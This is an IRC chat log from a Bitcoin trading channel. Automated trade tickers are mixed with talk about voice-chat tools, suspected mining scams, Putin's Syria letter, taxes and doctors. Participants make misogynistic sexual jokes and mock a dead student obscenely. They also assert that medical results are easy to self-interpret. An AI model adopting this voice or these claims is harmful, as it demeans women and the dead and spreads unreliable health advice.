Sep 12 02:39:41 [BTCTC] [BASIC-MINING] 1 @ 0.1301 BTC [-] Sep 12 02:39:42 [BTCTC] [BASIC-MINING] 6 @ 0.13 = 0.78 BTC [-] Sep 12 02:40:09 soon Google Hangout or whatever they call it by then will be fully functional in the same way, and I'll be able to suggest using my overlord of choice Sep 12 02:41:50 [BTCTC] [ACTIVEMINING] 13 @ 0.003401 = 0.0442 BTC [-] Sep 12 02:41:51 [BTCTC] [ACTIVEMINING] 4 @ 0.003301 = 0.0132 BTC [-] Sep 12 02:41:52 [BTCTC] [ACTIVEMINING] 18 @ 0.0033 = 0.0594 BTC [-] Sep 12 02:41:53 [BTCTC] [ACTIVEMINING] 79 @ 0.003278 = 0.259 BTC [-] Sep 12 02:41:55 [BTCTC] [ACTIVEMINING] 86 @ 0.003277 = 0.2818 BTC [-] Sep 12 02:44:07 true ballers use ICQ Sep 12 02:44:41 lol Sep 12 02:44:48 they need a better name than "hangout" Sep 12 02:46:45 [BTCTC] [LABCOIN] 600 @ 0.003422 = 2.0532 BTC [-] Sep 12 02:47:31 [BTCTC] [LABCOIN] 150 @ 0.003422 = 0.5133 BTC [-] Sep 12 02:48:43 dub pretty much only the pron industry ever used icq Sep 12 02:48:52 I use ICQ every day Sep 12 02:48:55 and by now they're out of business anyway. Sep 12 02:49:06 but I guess you could say I'm in the pr0n industry Sep 12 02:49:18 internet is for pr0n and all that Sep 12 02:49:18 [BTCTC] [ASICMINER-PT] 2 @ 2.26 = 4.52 BTC [+] Sep 12 02:50:24 cca 2003 icq going down was worse than san fernando running out of coke for the day. Sep 12 02:51:12 [HAVELOCK] [DEALCO] 70 @ 0.00962 = 0.6734 BTC [-] Sep 12 02:51:15 [HAVELOCK] [DEALCO] 4 @ 0.0096 = 0.0384 BTC [-] Sep 12 02:51:17 [HAVELOCK] [DEALCO] 66 @ 0.0096 = 0.6336 BTC [-] Sep 12 02:52:17 [BTCTC] [LABCOIN] 30 @ 0.003422 = 0.1027 BTC [-] Sep 12 02:52:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.02173 BTC [-] Sep 12 02:55:06 [BTCTC] [RSM] 100 @ 0.00937 = 0.937 BTC [+] Sep 12 02:58:53 mircea_popescu: I got everything in my momma name Sep 12 02:58:58 I'm hood rich how bout dat? Sep 12 03:00:21 [BTCTC] [TAT.ASICMINER] 5 @ 0.02172 = 0.1086 BTC [-] Sep 12 03:03:08 [HAVELOCK] [CFIG] 1 @ 0.149 BTC [-] Sep 12 03:03:43 good fopr you Sep 12 03:04:22 http://mumble.sourceforge.net/ Sep 12 03:04:24 Mumble Sep 12 03:05:02 -nsa Sep 12 03:05:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.02171 = 0.0434 BTC [-] Sep 12 03:06:20 [BTCTC] [BASIC-MINING] 4 @ 0.1455 = 0.582 BTC [+] Sep 12 03:06:20 [BTCTC] [BASIC-MINING] 3 @ 0.1456 = 0.4368 BTC [+] Sep 12 03:07:22 [BTCTC] [NASTY-PT] 500 @ 0.001914 = 0.957 BTC [-] Sep 12 03:08:59 [HAVELOCK] [CBTC] 200 @ 0.0004585 = 0.0917 BTC [-] Sep 12 03:09:01 [HAVELOCK] [CBTC] 9787 @ 0.000459 = 4.4922 BTC [+] Sep 12 03:10:35 $avg Sep 12 03:10:37 mircea_popescu: 134.92 Sep 12 03:10:43 ;;calc 7910 * 134.92 Sep 12 03:10:44 1067217.2 Sep 12 03:10:55 ha. that's over 1mn in bets kakobrekla Sep 12 03:10:58 [BTCTC] [LABCOIN] 1860 @ 0.003422 = 6.3649 BTC [-] Sep 12 03:11:20 not too shabby Sep 12 03:11:50 takes a woman nine months to make another and bitbet nine months to collect a million dollars. Sep 12 03:11:53 [BTCTC] [LABCOIN] 140 @ 0.003422 = 0.4791 BTC [-] Sep 12 03:11:54 ergo websites > women. Sep 12 03:12:03 [BTCTC] [LABCOIN] 1 @ 0.003421 BTC [-] Sep 12 03:12:07 yeah mumble works well for voice chat Sep 12 03:12:15 needs a server though, not magic-instant-p2p Sep 12 03:12:34 pankkake easy to find tho because so used by people like eve players Sep 12 03:12:50 gamers love mumble in general Sep 12 03:13:14 [BTCTC] [LABCOIN] 20 @ 0.003421 = 0.0684 BTC [-] Sep 12 03:13:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.0217 BTC [-] Sep 12 03:13:47 [BTCTC] [LABCOIN] 20 @ 0.003421 = 0.0684 BTC [-] Sep 12 03:14:01 encrypted, but hosted.. is there a p2p alt? Sep 12 03:14:44 [HAVELOCK] [CBTC] 900 @ 0.00045946 = 0.4135 BTC [+] Sep 12 03:16:46 [HAVELOCK] [XBOND] 123 @ 0.00113001 = 0.139 BTC [+] Sep 12 03:16:59 [HAVELOCK] [XBOND] 456 @ 0.00113 = 0.5153 BTC [-] Sep 12 03:17:12 found this: https://bitcointalk.org/index.php?topic=131905.80 Sep 12 03:18:57 [BTCTC] [ACTIVEMINING] 10 @ 0.003439 = 0.0344 BTC [+] Sep 12 03:19:49 [BTCTC] [ACTIVEMINING] 10 @ 0.003439 = 0.0344 BTC [+] Sep 12 03:20:14 doesn't seem to really exist Sep 12 03:21:16 anyway, what we really need is universal protocols - now everyone is developping its own protocol *and* client Sep 12 03:21:52 federated xmpp isn't that bad. it can do voice/video/text with encryption Sep 12 03:23:56 you can't trust "protocols" Sep 12 03:24:02 the nist saw to that. Sep 12 03:24:12 i would never use anything that implements a protocol for any serious purpose anymore. Sep 12 03:24:25 you wouldn't use bitcoin? Sep 12 03:24:34 bitcoin isn't a protocol, it's a fucking c hairball. Sep 12 03:25:30 and still, you can use many non-bitcoin-qt/d wallets Sep 12 03:25:34 it's what I'm talking about Sep 12 03:25:43 yeah, we're discussing unlike things. Sep 12 03:25:53 don't try to put a client and a protocol on users, allow users to chose their client Sep 12 03:26:07 [BTCTC] [KENILWORTH] 866 @ 0.001768 = 1.5311 BTC [-] Sep 12 03:26:08 [BTCTC] [KENILWORTH] 999 @ 0.001769 = 1.7672 BTC [+] Sep 12 03:26:10 [BTCTC] [KENILWORTH] 635 @ 0.001775 = 1.1271 BTC [+] Sep 12 03:26:25 just don't try to sell me on any sort of comittees making "industry standards" or anything. Sep 12 03:26:51 [BTCTC] [KENILWORTH] 1290 @ 0.001775 = 2.2898 BTC [+] Sep 12 03:26:56 oh, no, that's not what I am talking about Sep 12 03:27:03 yeah. Sep 12 03:27:18 [BTCTC] [LABCOIN] 200 @ 0.00342 = 0.684 BTC [-] Sep 12 03:27:45 why do people buy kenilworth Sep 12 03:28:00 is there somethin i dont get Sep 12 03:28:12 afrotec iirc some activist users managed to sue the guy in avalon court and got the items delivered ? Sep 12 03:28:22 or wait, that was bakewell's thing Sep 12 03:28:37 kenilworth is the irl mining scam Sep 12 03:28:43 yes my bad. Sep 12 03:28:51 [BTCTC] [LABCOIN] 200 @ 0.00342 = 0.684 BTC [-] Sep 12 03:28:51 Wasnt there like a doc about them being bankrupt Sep 12 03:29:01 thats what i thought... Sep 12 03:29:09 [BTCTC] [ASICMINER-PT] 1 @ 2.241 BTC [-] Sep 12 03:29:11 [BTCTC] [ASICMINER-PT] 1 @ 2.24 BTC [-] Sep 12 03:29:11 and no divs or anything Sep 12 03:29:12 [BTCTC] [ASICMINER-PT] 3 @ 2.235 = 6.705 BTC [-] Sep 12 03:29:13 [BTCTC] [ASICMINER-PT] 4 @ 2.234 = 8.936 BTC [-] Sep 12 03:29:15 what the fucks the point Sep 12 03:30:09 lol Sep 12 03:30:17 they release documents in chinese now Sep 12 03:30:27 lol what, it's fashionable ? Sep 12 03:30:52 ya i saw that, they're really taking mining spec scam to a whole 'nother level Sep 12 03:30:56 i don't know, the kelliworth thread is more than dead actually Sep 12 03:31:02 lol Sep 12 03:31:22 [BTCTC] [ASICMINER-PT] 3 @ 2.232 = 6.696 BTC [-] Sep 12 03:31:47 lol Sep 12 03:32:04 there is absolutely no understandable communication from them Sep 12 03:32:20 i wonder if they can claim bankruptcy while holding millions in B Sep 12 03:32:46 it never got thousands afaik. Sep 12 03:33:18 another dream shattered :/ Sep 12 03:34:14 120k shares for 925k usd for 17% equity in their company Sep 12 03:34:23 WHERE DO I SIGN UP Sep 12 03:34:40 [BTCTC] [TAT.ASICMINER] 5 @ 0.02139 = 0.107 BTC [-] Sep 12 03:34:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.02132 BTC [-] Sep 12 03:34:42 [BTCTC] [TAT.ASICMINER] 56 @ 0.02132 = 1.1939 BTC [-] Sep 12 03:34:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.02115 BTC [-] Sep 12 03:34:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.02115 BTC [-] Sep 12 03:34:46 [BTCTC] [TAT.ASICMINER] 33 @ 0.02115 = 0.698 BTC [-] Sep 12 03:34:52 http://bitbet.us/bet/521/labcoins-own-130nm-design-sample-chips-will-be/#c1404 Sep 12 03:34:58 BitBet - Labcoins own 130nm design sample chips will be received by testers by 12TH SEPT 2013 Sep 12 03:35:00 "Lmao bunch of forum dusters. Spilled five billion words over this crap, barely touched 10BTC in bets. GET JOBS LOSERS." Sep 12 03:35:07 pretty fucking on the spot. Sep 12 03:35:49 Get outcome: Duh Sep 12 03:35:57 same for inactivemining I fear Sep 12 03:36:02 but I want their monies :( Sep 12 03:36:03 er Bet* Sep 12 03:36:06 [BTCTC] [TAT.ASICMINER] 50 @ 0.02101 = 1.0505 BTC [-] Sep 12 03:36:08 [BTCTC] [TAT.ASICMINER] 14 @ 0.02099 = 0.2939 BTC [-] Sep 12 03:36:09 [BTCTC] [TAT.ASICMINER] 20 @ 0.02097 = 0.4194 BTC [-] Sep 12 03:36:10 [BTCTC] [TAT.ASICMINER] 8 @ 0.02096 = 0.1677 BTC [-] Sep 12 03:36:11 pankkake can't have what they ain't got. Sep 12 03:36:29 someone should make a betsite for hopes. Sep 12 03:36:37 there are some big shareholders. awfully quiet though Sep 12 03:36:41 that'll get decent volume out of the forum famous. Sep 12 03:36:48 for hopes? Sep 12 03:36:58 yeah. you don't bet btc or anything palpable. Sep 12 03:37:02 [BTCTC] [LABCOIN] 6 @ 0.00342 = 0.0205 BTC [-] Sep 12 03:37:06 [MPEX] [S.MPOE] 7000 @ 0.00089111 = 6.2378 BTC [+] Sep 12 03:37:23 you bet like, words. or hopes. or delusions. or you know, stuff like that. Sep 12 03:37:44 does that even work on teh nets? Sep 12 03:37:45 [BTCTC] [LABCOIN] 440 @ 0.00342 = 1.5048 BTC [-] Sep 12 03:38:04 i dunno Sep 12 03:38:21 actually I found one, while I was researching stuff about bets. http://predictionbook.com/ Sep 12 03:38:22 but i suspect all bets would be infinity to infinity. Sep 12 03:39:06 it's mostly guys from lesswrong.com so way above the average bitcointalker Sep 12 03:39:45 [BTCTC] [LABCOIN] 10 @ 0.00342 = 0.0342 BTC [-] Sep 12 03:39:59 probably needs a better explanation of statistical deviation tho. Sep 12 03:40:12 at least some basic l'hopital. Sep 12 03:40:32 "If you're properly calibrated, you'll be able to see that about 60% of the things you're 60% sure will happen, do happen, and 90% of the things you're 90% sure will happen, do happen." << outright wrong for instance. Sep 12 03:41:23 lol Sep 12 03:43:48 [BTCTC] [LABCOIN] 22 @ 0.00342 = 0.0752 BTC [-] Sep 12 03:43:49 [BTCTC] [LABCOIN] 731 @ 0.003421 = 2.5008 BTC [+] Sep 12 03:44:15 [HAVELOCK] [AM100] 1 @ 0.022 BTC [+] Sep 12 03:44:21 [HAVELOCK] [XBOND] 1422 @ 0.0011295 = 1.6061 BTC [-] Sep 12 03:44:39 [HAVELOCK] [XBOND] 82 @ 0.001129 = 0.0926 BTC [-] Sep 12 03:47:20 i come back and see semester 2 calculus being discussed Sep 12 03:47:23 what the fuck guise Sep 12 03:47:37 [HAVELOCK] [CBTC] 1500 @ 0.0004 = 0.6 BTC [-] Sep 12 03:47:38 .bait Sep 12 03:47:50 no? Sep 12 03:47:55 i guess it's deizel. Sep 12 03:48:00 show us your tits! Sep 12 03:48:14 .boobs Sep 12 03:48:24 >:( Sep 12 03:48:54 [HAVELOCK] [AM100] 2 @ 0.022 = 0.044 BTC [+] Sep 12 03:50:47 It was Ariane Noelle Patterson’s 21st birthday, and she was grateful to be alive. Sep 12 03:50:47 The Gardner-Webb University student took to her Twitter account on Jan. 17 and posted the message: “Thank you God for another year of life.” Sep 12 03:50:47 Hours later, she collapsed during a religion class and was rushed to nearby hospital, where she was pronounced dead. Sep 12 03:51:10 don't call the lord name in vain Sep 12 03:51:56 or something Sep 12 03:52:27 gwu is wicked in the eyes of the lord. Sep 12 04:02:00 how's the current weight at bitbet calculated? Sep 12 04:02:42 linear degression from 100k till 1 over time? Sep 12 04:03:05 mircea_popescu: does it say what she died of? Sep 12 04:04:37 jesusitis Sep 12 04:06:11 dexX7 well the end weight is specified at bet creation Sep 12 04:06:18 but otherwise yes, linear. Sep 12 04:06:34 thestringpuller exploded vagina in spirit. 2nd coming was thus averted. Sep 12 04:06:57 haha Sep 12 04:06:58 http://www.nytimes.com/2013/09/12/opinion/putin-plea-for-caution-from-russia-on-syria.html?src=twr&_r=2& Sep 12 04:07:24 welcome bait ozbot. Sep 12 04:07:52 dub figure he wrote it himself or ghostwritten ? Sep 12 04:07:56 sit down yankee doodle or we'll fuck your shit up Sep 12 04:08:08 figure he's too drunk to have written that Sep 12 04:08:56 reads like he subbed in chomsky oslt Sep 12 04:08:59 you know he basically never drinks ? Sep 12 04:09:17 he's russian Sep 12 04:09:19 putin is a kgb boy. as clean cut as you can dream of. Sep 12 04:10:47 interesting Sep 12 04:13:42 Under current international law, force is permitted only in self-defense or by the decision of the Security Council. Anything else is unacceptable under the United Nations Charter and would constitute an act of aggression. Sep 12 04:14:05 that's an ultimatum isnt it. Sep 12 04:16:08 i think it's pretty much the definition used throughout the un chapters, not "that kind" of aggression Sep 12 04:16:23 i wish all those coldwar fucks on every side of the isle would just go retire Sep 12 04:16:30 i think that sort of ambiguity is exactly how ultimatums are delivered politely. Sep 12 04:16:58 right Sep 12 04:20:09 I carefully studied his address to the nation on Tuesday. And I would rather disagree with a case he made on American exceptionalism, stating that the United States’ policy is “what makes America different. It’s what makes us exceptional.” It is extremely dangerous to encourage people to see themselves as exceptional, whatever the motivation. Sep 12 04:20:20 that's why he did it, too. Sep 12 04:20:45 i don't think the the long and mostly abject history of the united states a us president was ever humiliated quite to the degree. Sep 12 04:34:01 ya, getting bitch-slapped 101 Sep 12 04:34:19 mod6 speaks Sep 12 04:34:20 he's alive Sep 12 04:34:22 lololol Sep 12 04:37:57 so what's next, obama going in narcissistic rage on all tv stations tonite ? Sep 12 04:38:21 he's too smart for that Sep 12 04:38:59 i never heard of that defense working. Sep 12 04:39:12 it's like saying a girl has too big tits to be a slut. Sep 12 04:39:17 obama is on tv every day now? Sep 12 04:39:20 probably no public or formal response. just more of the same. Sep 12 04:39:26 i don't think we'll see a reversal of his position to strike Sep 12 04:39:34 pankkake roughly. Sep 12 04:40:01 like the great nation of cuba or north korea i guess Sep 12 04:40:50 putin's letter makes it harder now for obama to reverse course Sep 12 04:40:52 well korea doesn't really have tv and from what i hear ralph castro is kinda quiet. Sep 12 04:41:14 or maybe it's venezuela Sep 12 04:41:19 well they're all dead now Sep 12 04:42:58 they need to raise the debt limit, so thats the real game at play. probably they'll keep up the pressure on assad and cooperate with UN/russia to get the weapons out, perhaps saving some face for obama. but there will be enough jitters to force congress to raise up to 20Tn perhaps, and then, moar bonds to buy!!!11 Sep 12 04:43:17 really, go to war to raise more debt? Sep 12 04:43:22 that's fucked up Sep 12 04:43:28 look who we're talking about... Sep 12 04:43:44 bush? Sep 12 04:43:54 pankkake its strictly how it works Sep 12 04:43:57 they're all the same. Sep 12 04:44:03 it doesn't matter, its about money. Sep 12 04:44:05 the only way for bankrupt states to sell bonds is war. since at least 1600 Sep 12 04:44:13 oh, I totally believe it's a valid explanation Sep 12 04:44:46 I met a guy who said "bitcoin is going to end wars" Sep 12 04:44:53 I didn't realize why at first Sep 12 04:45:03 it is not going to end wars, it's going to end states. Sep 12 04:45:04 that's an interesting thought Sep 12 04:45:12 we'll still have wars, but in the medieval sense of the term Sep 12 04:45:35 my band of 100 swiss mercenaries beating the crap out of eriks troop of 120 suabians. Sep 12 04:45:45 I'm fine with that Sep 12 04:45:52 me too. promises to be fun. Sep 12 04:46:07 sorta sporty really. Sep 12 04:48:10 it's also funny how a lot of laws/taxes/etc. were created during wars Sep 12 04:48:19 as """temporary""" measures Sep 12 04:48:24 at least in France Sep 12 04:48:36 but I think the US has the income tax due to a war too? Sep 12 04:49:41 there was a tax on phone use authorised for a war a hundred years ago Sep 12 04:49:43 still in force. Sep 12 04:52:52 http://en.wikipedia.org/wiki/Federal_telephone_excise_tax << From 1898 to 2006 there was excise tax to pay for the Spanish-American War, this commonly showed up in peoples telephone bills. Sep 12 04:53:17 that the most absurd thing to tax Sep 12 04:53:52 inasmuch as taxes are absurd, there can't be degrees in what's absurd to tax. Sep 12 04:53:54 all the same. Sep 12 04:54:17 ^^^ Sep 12 04:54:19 However, the IRS stated in 2007 that millions of taxpayers failed to take the credit, leaving $4 billion still to be claimed. The credit can be claimed by those who neglected to take it, but only by amending a 2006 tax return. Sep 12 04:54:23 LOL Sep 12 04:54:29 usually they are justified like "you pay a tax on cars to pay for the roads" (though it never happens like that, they are rarely allocated) Sep 12 04:54:39 but a tax on phones to fund a war? Sep 12 04:54:54 well the war started cause of all the assholes prank cvalling long distance Sep 12 04:54:56 into mexico Sep 12 04:55:00 hahaha Sep 12 04:55:07 hahah Sep 12 05:00:22 france had due to the war: ban of firearms, national police, minimum wage, id card, health "diary", social security id, licenses to serve alcohol, welfare for families, ponzi retirement plans Sep 12 05:00:29 it's like nothing has changed since Sep 12 05:01:16 sport in final high school exam too, certainly the worst! Sep 12 05:01:44 that part i can see. Sep 12 05:01:53 wouldn't want any girls graduating with a diploma that can't do the splits. Sep 12 05:02:08 mostly lame sports Sep 12 05:02:32 one that was easy to cheat, as you had points for predicting your performance Sep 12 05:02:53 Diablo-D3: carnet de santé, a thing where you write everything related to health from your birth Sep 12 05:03:22 and since I was bad, I just predicted an absurdly bad performance, but that was easy to achieve Sep 12 05:03:38 we don't have those (yet) Sep 12 05:07:24 eh, I'm sure when it's done it will be done the worst way possible Sep 12 05:08:44 pankkake quite the pangloss are you. Sep 12 05:09:37 fuck that Sep 12 05:09:45 I work hard to hide my medical history :) Sep 12 05:10:02 if my insurance got wind, fuck Sep 12 05:10:03 is there a reason to doubt it? Sep 12 05:12:42 lately I had a medical exam done, I couldn't even have access to it myself Sep 12 05:12:46 how crazy is that Sep 12 05:12:52 yeah same Sep 12 05:12:55 what ?! Sep 12 05:13:04 insurance order it Sep 12 05:13:14 last time i used a doctor's services it was because this chick had sudden belly pains. Sep 12 05:13:27 too much cum? Sep 12 05:13:30 i walked into a local hospital, asked the doctor on duty to hop her on the ecograph and let's take a look Sep 12 05:13:32 funny thing is, I told the insurance sales guy about the one thing that is on my public file Sep 12 05:13:39 well i thought it was the appendix, but the machine showed air Sep 12 05:13:45 so i thanked the woman and went on my way. Sep 12 05:14:08 'you had your face reconstructed after blowing it up with a bomb?! yeah lets leave that off teh application' Sep 12 05:14:11 but mind you : i didn't pay anything and didn't use any id. Sep 12 05:14:15 in america that would take multiple doctor visits and thousands of dollars MP Sep 12 05:14:30 i wanted to pay the woman something bu8t she wouldn't take it Sep 12 05:14:39 so i sent the driver later with a brick of coffee Sep 12 05:14:52 anyway, twenny bux or w/e. Sep 12 05:16:23 but this is what being a doctor essentially is, neh ? a liberal profession, you work for your patient. Sep 12 05:16:52 that's not how it feels Sep 12 05:16:55 not in the united states of ameristan you pinko commie fuck Sep 12 05:16:59 I'm more in the position of a beggar Sep 12 05:17:04 well wtf. Sep 12 05:17:27 i like the spirit of it, anyway. explain wtf the problem is to the person with the tool, take a look, all that. Sep 12 05:17:33 it's what a country is all about imo. Sep 12 05:18:07 this sounds markedly socialist for you mp Sep 12 05:18:12 srsly ?! Sep 12 05:18:38 i mean sure, it doesn't work worth a shit if you weren't in school and consequently don't know semiology from your asshole. Sep 12 05:18:48 but if you do... the system should work for you wtf. Sep 12 05:19:53 doctoring is a lot easier than it looks Sep 12 05:20:32 in retrospect i don't recall a time when medicine didn't work like this, you walk in, explain what the problem si and what you want done. Sep 12 05:20:39 i guess that must mean it is socialist... Sep 12 05:20:48 but fuck, it worked no different in costa rica. Sep 12 05:20:58 in the US you'd have to schedule a visit, ask insurance to pay, tell Dr problem, reschedule visit to specialist, ask insurance to pay, visit specialist - wait weeks for result, ask insurance to pay, schedule new dr appt. to discuss results, ask insurance to pay, schedule appt with specialist to carry out treatment plan, ask insurance to pay, a month later get treated, get denied by insurance Sep 12 05:21:03 its more about access to tool that costs a million and you will only ever need once Sep 12 05:21:07 medicine in the states is a joke Sep 12 05:21:26 dub but you explain why you need it and what for, and so it's fine. logically. neh ? Sep 12 05:21:44 Duffer1: funny how it's the same in France Sep 12 05:21:47 yea Sep 12 05:22:04 every expensive specialist => "well no I only pay for $10 painkillers, fuck you" Sep 12 05:22:24 krs1 you can't even really call it "medicine" here Sep 12 05:22:34 and preferably recieve direct outputs you can self interpret rather than relying on the overworked, drug addicted, doctor robot Sep 12 05:22:42 dub right. Sep 12 05:23:17 I'm waiting for automated diagnosis machines Sep 12 05:23:21 i don't mean self interpret in the sense of, inventing a whole new medicine Sep 12 05:23:27 but in the sense of indeed seeing wtf the doctor is on about. Sep 12 05:24:26 quite often the doctor doesnt know wtf he is on about Sep 12 05:24:32 i mean i need him to decide if that murmur is ventricular or not, cause i have no clue Sep 12 05:24:49 more than once I've had my life threatened by misdiagnosis Sep 12 05:26:03 i suspect the explanation is again intellectual lazy. people just got used to going to the doctor as if he were the shaman Sep 12 05:26:08 "plz to make me good again ty" Sep 12 05:26:25 rather than as if he were some sort of professional with an actual profession, we roughly know and understand and follow. Sep 12 05:26:50 when I ask questions they usually seem displeased Sep 12 05:27:05 well do you ask stupid questions ? Sep 12 05:27:17 of course, questions cut into the 10 minute healing allocation Sep 12 05:27:20 no it's very basic, like the actual name of the thing I might have Sep 12 05:27:38 the symptoms etc. Sep 12 05:27:43 i think that probably would qualify as stupid questions. Sep 12 05:28:19 not the most succinct line of questioning no Sep 12 05:28:35 you know now im half sorry i never needed anything from a doctor while in the us, i could have formed an opinion on the topic Sep 12 05:28:51 if I'm going to a doctor I eather need something repaired or an seeking testing to confirm my own research Sep 12 05:29:02 dub well think about if someone was sitting by you while you were trying to fix a netcard asking you what it's called. Sep 12 05:29:07 repaired as in, stiched or splinted Sep 12 05:32:15 except it's not like that. it's the shaman giving you a list of things to take and not telling you why Sep 12 05:32:17 yeah, the more i think about this i realise my idea basically is that any adult should be roughly at the level of general practice intern, able to discuss intelligently if generally a whole host of topics with a clinician. Sep 12 05:32:24 this is too much to ask ofpeople. Sep 12 05:32:45 I certainly should have gone into medicine for that, as I learned nothing from my actual education Sep 12 05:32:51 pankkake: its your, hopefully informed, choice to accept that or not Sep 12 05:32:59 pankkake you have a point. Sep 12 05:34:44 anyway dub tell me more about the socialism. Sep 12 05:34:55 general practise inten has just spent 8 years getting high at school and fucking first years Sep 12 05:35:41 md is that person that was too useless to progress Sep 12 05:36:15 those that specialise are useful but only for specific field Sep 12 05:37:21 well yes, buyt there's a minimal level required of comprehending medicine as a cultural endeavour that allows you to interface with them Sep 12 05:39:25 or not, depending on how well you intend to be at the end Sep 12 05:42:34 well what, you're gonna put your own stents in ? Sep 12 05:44:20 you want doctors to take care of you, you have to be insistent Sep 12 05:44:37 even here in socialist canada, they'll rush you out the door unless you dig your heels in Sep 12 05:44:59 you can be as knowledgeable as you want, as long as you force them to do their job Sep 12 05:45:28 nubbins`: is a nubbins` Sep 12 05:45:36 ;;ud nubins Sep 12 05:45:36 http://www.urbandictionary.com/define.php?term=Nubin | 3. Nubin. The little piece of hair that grows in front of your ears. Or, alternately, the first section of hair cut in a haircut. "Snip the little nubin first" - Kelly Moody. Sep 12 05:45:38 ;;ud nubbins Sep 12 05:45:39 Urban Dictionary: Nubin Sep 12 05:45:39 http://www.urbandictionary.com/define.php?term=nubbins | Check your nubbins! They're hanging out of your bathing suit, Savanna! 2. My nubbins look like milk duds! 3. Get your nubbins off me gold! mark as favorite buy  ... Sep 12 05:45:41 Urban Dictionary: nubbins Sep 12 05:46:04 get your nubbins off me gold Sep 12 05:46:32 how often does someone requiring a stent take themselves off for a freindly chat with a doctor Sep 12 05:47:28 all the time ? Sep 12 05:47:35 if my leg is broke, I'll probably go along. finger, toe, arm to some degree, probably not Sep 12 05:47:36 stents aren't usually emergency procedure. Sep 12 05:48:17 its quite likely after some critical escalation of ill health though Sep 12 05:48:21 like heart attack Sep 12 05:48:32 a yes, but they get put in preventively all the time. Sep 12 05:48:38 obviously also used in all sorts of surgery. Sep 12 05:49:27 dub what do you do anyway, you sound like a stuntman by now. Sep 12 05:49:35 my point was more about less acute issues Sep 12 05:50:08 ie, when a doctor runs your bloods, the results are actually interpreted at teh lab, he just reads them out Sep 12 05:50:30 no they aren't. you can interpret them, it's not such a big mystery. Sep 12 05:50:33 if you spend 10 minutes workign out how to read the sheet you're doign the doctoring Sep 12 05:50:51 well the doctoring is in knowing which interpretations to pick Sep 12 05:50:56 and which are mostly paranoid delusion. Sep 12 05:51:00 yeah but we have google now Sep 12 05:51:05 and, yes Sep 12 05:51:07 google isn't too great for that. Sep 12 05:51:17 take the stock movement interpretation, it's not so different. Sep 12 05:51:38 noobs stumble in here all the time asking me how do i know x and getting offended when i tell them i don't care what they think. Sep 12 05:52:01 cause it's not fair i tell you! why should i not care! are they not people too ?! Sep 12 05:52:11 google will give you the 'accepted tolerances' that the doctor will rattle out Sep 12 05:52:35 pics of the first bfl sc shipment i got Sep 12 05:52:36 http://tinyurl.com/ohz2jmz Sep 12 05:52:43 imgur: the simple image sharer Sep 12 05:52:47 yes but you being outside of them has meanings, which are very context dependent. Sep 12 05:53:05 KRS1 57 seconds ago cool :D Sep 12 05:53:15 KRS1: looks just like mine did Sep 12 05:53:21 make a blog do a proper unboxing. Sep 12 05:54:00 lol rly Sep 12 05:54:13 im lazy Sep 12 05:55:05 http://tinyurl.com/o8hz4ls Sep 12 05:55:08 imgur: the simple image sharer Sep 12 05:55:27 dont mind that powder on the right Sep 12 05:56:05 I'm glad they shipped priority service, it got here quicker. Sep 12 05:56:12 clearly the sane approach is to leave it in the box and kick up ebay Sep 12 05:56:37 We appreciate your business and value you as a customer Sep 12 05:57:26 dub has it. Sep 12 05:57:55 mircea_popescu: tbh for years now every doctor I've visited has pulled up google durign the consult Sep 12 05:57:56 http://tinyurl.com/p7qt6bg Sep 12 05:58:00 imgur: the simple image sharer Sep 12 05:58:05 or some healthweb equiv Sep 12 05:58:15 lulzy. Sep 12 05:58:21 last time, broken ribs, not exactly rocket science Sep 12 05:58:22 i never had that one. Sep 12 05:58:44 give me drugs, strong ones and a bit of time off work Sep 12 05:58:47 you know im starting to suspect maybe local doctors are a lot better trained ? Sep 12 05:58:56 f'n doctors..one good one out of a bunch..also they may be smart but the know nothing about how to run a business imo Sep 12 05:59:02 my left hand was broke once (and I'm a leftie) Sep 12 05:59:33 I was in fucking pain and people just dismissed me at first Sep 12 05:59:39 (it happened at school) Sep 12 06:00:03 I used to have a removable cast thing I used for broken hands and arms, no need to go to th edoctor Sep 12 06:00:08 DEA here in the states have doctors scared shitless to prescribe pain meds now Sep 12 06:00:09 pankkake it's quite obvious when it's broken. you have this sensation like it's being tightly squeezed in a vice. Sep 12 06:00:38 depends on breakage Sep 12 06:01:13 There's more talk when bot ain't around it seems. Sep 12 06:01:22 some you don't feel without putting a bit of firce on Sep 12 06:01:25 force* Sep 12 06:01:41 fissures Sep 12 06:02:18 anal fissures? Sep 12 06:02:41 i need some leet pics wheres that url Sep 12 06:02:58 pankkake: got a good couple of inches snapped off collarbone at school, school nurse throught it was dislocated and tried to reset :) Sep 12 06:03:03 bone fissures lol Sep 12 06:04:47 I didn't really mind not being able to write for a while, it gave me an excuse to slack Sep 12 06:04:58 but masturbating was horrible Sep 12 06:05:08 wheres bitcoin for pr0ns Sep 12 06:06:16 damn..need moar AC..just had a $2K unit installed and its still not enough. Sep 12 06:07:16 buy more bfl! Sep 12 06:07:29 not so sure Sep 12 06:08:00 i just pre ordered 20 bfl jalapenos Sep 12 06:08:32 theres some good competition out there and I think the technology is going to get better quickly while getting much cheaper..f'n timing. Sep 12 06:08:37 it's wise; they don't cost anything in electricity Sep 12 06:09:04 but hashrate and difficulty is going through the roof..they're going to be insignificant in terms of work output Sep 12 06:09:29 freshcoin why not the asicminer thumb things ? Sep 12 06:09:31 the bad joke was that devices you don't have don't cost anything to run Sep 12 06:09:45 /s Sep 12 06:09:47 oh i see pankkake lol Sep 12 06:09:59 oic Sep 12 06:10:26 i didn't want to hate all over someone who just got scammed, glad to hear it's not true :P Sep 12 06:10:27 what's the jalapenos supposed ot do anyway, 5gh ? 50gh ? Sep 12 06:10:45 seems like you have a better chance at winning the powerball than getting anything from bfl Sep 12 06:10:48 haha Sep 12 06:11:25 the conversation is over Namworld. Sep 12 06:12:14 or not Sep 12 06:16:01 [BTCTC] [LABCOIN] 4 @ 0.003439 = 0.0138 BTC [-] Sep 12 06:16:02 [HAVELOCK] [DEALCO] 34 @ 0.0096 = 0.3264 BTC [-] Sep 12 06:16:04 [HAVELOCK] [CBTC] 6000 @ 0.0005 = 3 BTC [+] Sep 12 06:16:06 [HAVELOCK] [DEALCO] 17 @ 0.0095 = 0.1615 BTC [-] Sep 12 06:17:26 freshcoin: folks are indeed getting shipments..the joke now is how long it took to get them out..they delivered mine priority mail to get it here within a reasonable amount of time *smirk* Sep 12 06:17:32 